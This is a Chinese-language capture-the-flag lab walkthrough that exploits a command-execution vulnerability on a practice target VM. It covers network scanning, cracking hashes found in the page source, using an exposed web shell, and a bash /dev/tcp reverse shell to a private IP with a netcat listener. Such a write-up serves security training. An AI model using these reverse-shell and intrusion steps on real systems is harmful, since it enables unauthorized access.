ctf訓練 命令執行漏洞
ctf訓練 命令執行漏洞
命令執行漏洞介紹
當應用需要呼叫一些外部程式去處理內容的情況下,就會用到一些執行系統命令的函式。如PHP中的system、exec、shell_exec等,當使用者可以控制命令執行函式中的引數時,將可以注入惡意系統命令到正常命令中,造成命令執行攻擊。
呼叫這些函式執行系統命令的時候,如果將使用者的輸入作為系統命令的引數拼接到命令列中,又沒有過濾使用者的輸入的情況下,就會造成命令執行漏洞。
實驗環境
一臺kail攻擊機 和 靶機
靶機映象:https://pan.baidu.com/s/1wuAg-hARIBb_HNDZjqfrpQ
提取碼:rh8v
安裝開啟靶機(使用Oracle VM VirtualBox開啟):
(注意:靶機用橋接模式則攻擊機也用橋接模式,注意檢查!!!!)
接下來發現沒法登陸,也沒有辦法獲取ip地址
所以我們在kail下
進入控制檯
使用netdiscover命令 netdiscover -r ip/子網掩碼 命令來探測靶機
執行緒調到20,名字改為py
發現了admin這樣一個目錄
這裡nikto發現一個可疑目錄/dev
訪問/dev,發現了一個web-shell
然後想著檢視原始碼,發現一些hash值,然後儲存這些值
6515229daf8dbdc8b89fed2e60f107433da5f2cb 38882f3b81f8f2bc47d9f3119155b05f954892fb c6f7e34d5d08ba4a40dd5627508ccb55b425e279 0e6ae9fe8af1cd4192865ac97ebf6bda414218a9 553d917a396414ab99785694afd51df3a8a8a3e0 ddf45997a7e18a25ad5f5cf222da64814dd060d5 d8b8dd5e7f000b8dea26ef8428caf38c04466b3e
hash破解
使用線上工具進行破解,然後破解出來的值為bulldog,然後去原始碼下檢視,對應的使用者名稱為nick,然後登入
開放了80埠,使用dirb進行探測
dirb http://靶機ip,發現了兩個可疑目錄admin和dev
接下來我們通過瀏覽器訪問,http://靶機ip/admin/,是一個登入介面
然後我們就進入到了系統後臺
漏洞利用
這裡有安裝教程:https://blog.csdn.net/qq_43799246/article/details/110669829
講一個工具
挖漏洞,用掃描,可以使用AVWS進行掃描
這裡輸入靶機ip
然後點選scan,選擇全掃描
然後就開始掃描了
我們進入了系統後臺,再一次檢視dev目錄,然後我們發現這裡的webshell可以點開了
根據提示我們可以嘗試一下這些命令,得到結果
這裡發現id不能使用
反彈shell
攻擊機啟動監聽netcat
nc -nlvp 4444
靶場機器反彈shell
echo 'bash -i>& /dev/tcp/192.168.43.96/4444 0>&1' | bash
拿到shell
滲透測試技巧
優化反彈shell終端
python -c "import pty;pty.spawn('/bin/bash')"
我們在使用customPermissionApp提權時,先看說明檔案
SUPERultimatePASSWORDyouCANTget
相關文章
- 命令執行漏洞
- 靶機練習---通達OA,遠端命令執行漏洞復現
- Apache SSI 遠端命令執行漏洞Apache
- PHPMailer遠端命令執行漏洞復現PHPAI
- WordPress4.6任意命令執行漏洞
- 例項後臺執行訓練或任務
- Firefox 31~34遠端命令執行漏洞的分析Firefox
- DHCP命令執行CVE-2018-1111漏洞復現
- xxl-job預設accessToken命令執行漏洞復現
- Apache Log4j2遠端命令執行漏洞Apache
- pgAdmin未授權命令執行漏洞(CVE-2022-4223)
- 【安全公告】Spring Core遠端命令執行漏洞預警Spring
- IIS 7.5 解析錯誤 命令執行漏洞解決方案
- CVE-2017-8464遠端命令執行漏洞復現
- CNVD-2018-01084 漏洞復現報告(service.cgi 遠端命令執行漏洞)
- Linux常用精簡命令實訓練習Linux
- 利用CouchDB未授權訪問漏洞執行任意系統命令
- ThinkPHP 5.x 遠端命令執行漏洞分析與復現PHP
- 【預訓練語言模型】 使用Transformers庫進行BERT預訓練模型ORM
- Docker執行命令Docker
- Linux Sudo 被爆重要漏洞,允許黑客提權執行root命令Linux黑客
- CVE-2018-1273 Spring Data Commons 遠端命令執行漏洞復現Spring
- LLM並行訓練5-MoE並行並行
- Docker命令-docker exec-在執行的容器中執行命令Docker
- CERIO-DT系列路由器Save.cgi介面存在命令執行漏洞路由器
- Oracle WebLogic 曝 0day 漏洞,攻擊者可遠端執行命令OracleWeb
- 【預訓練語言模型】使用Transformers庫進行GPT2預訓練模型ORMGPT
- .net執行cmd命令
- Java執行cmd命令Java
- CTF逆向:將陣列作為函式程式碼執行陣列函式
- 收集 Linux 命令列執行的命令Linux命令列
- LLM並行訓練2-張量並行並行
- LLM並行訓練1-流水線並行並行
- LLM並行訓練3-資料並行並行
- 最新漏洞:Spring Framework遠端程式碼執行漏洞SpringFramework
- 滲透測試對網站漏洞修復執行命令重點檢查網站
- PKAV 發現 Struts2 最新遠端命令執行漏洞(S2-037)
- SaltStack未授權訪問及命令執行漏洞分析(CVE-2020-16846/25592)